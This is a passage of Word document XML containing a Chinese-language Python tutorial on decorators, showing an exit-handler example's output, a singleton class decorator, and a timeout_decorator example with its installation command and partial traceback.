          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始执行脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3536A13D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>time.sleep(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD45FE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print("Ending")                            # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本执行完毕</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6EEF7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E66374" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行后的输出结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48823946" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DC0DFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$ python onexit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0311A1C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Starting running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5677A389" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ending</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C9959D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>on_exit_func2() is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7D8685" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>on_exit_func1() is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709E7807" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6F8AF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>、单例模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7433319E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B037F52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这时装饰器装饰的类，表示该类最多只能有一个实例对象。演示例子如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00384FA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5350B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; def singleton(cls):                # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装饰器，不过传入的是一个类对象而不是函数对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164C610A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...     instances = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B337559" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...     def getinstance():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50298ED1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>...         if cls not in instances:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6558C1F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">...             instances[cls] = cls()      # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19157D84" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...         return instances[cls]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687CFC8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...     return getinstance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF1B7FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">...                                         # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装饰器定义结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C4E08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; @singleton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BA830B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>... class DemoClass1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1941F352" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...     def __init__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12205EB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...         self.field1 = 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDE68B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...         self.field2 = "python"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35645DAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">...                                          # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被装饰的类定义结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666A48A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; obj1 = DemoClass1()                      # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建两个对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16721F37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; obj2 = DemoClass1()                      # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33242DB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; obj1 is obj2                             # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这两个对象是否是同一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFA89D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">True                                         # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是同一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F85E393" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7877A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E927E02" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>、执行时间限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F8EBBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C78A9C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有时需要限定某个函数的执行时间，如果超出该时间，需要强制结束运行。提供这种装饰器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包很多，这里仅介绍其中一个，即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> timeout_decorator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C15CAEC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B16B033" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> timeout_decorator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前，需要自行安装，方法是运行下面的命令行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30728705" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>timeout-decorator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B29346" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41C8B0B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2FE625" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>import timeout_decorator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                           # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入装饰器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079D03D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>@timeout_decorator.timeout(5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                      # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能超时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA92640" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def func_with_time_limit():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2D223E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("Start")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578778D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in range(1,10):                          # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0332D108" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F89D0FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("{} seconds have passed".format(i))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75232C69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616BB952" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    func_with_time_limit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB15E52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B7C6055" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行该脚本，输出如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D887020" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>$ python timeoutdemo1.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66424DE5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B334F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1 seconds have passed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E03BB5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2 seconds have passed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60373A71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3 seconds have passed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C9FD95" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4 seconds have passed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D12129E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Traceback (most recent call last):                      # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>打印出来调用栈</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39614144" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  File "timeoutdemo1.py", line 12, in &lt;module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6311AFEF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    func_with_time_limit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389742AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE60BC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"/anaconda3/lib/python3.7/site-packages/timeout_decorator/timeout_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5E3007" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        decorator.py",</w:t>
      </w:r>
    </w:p>
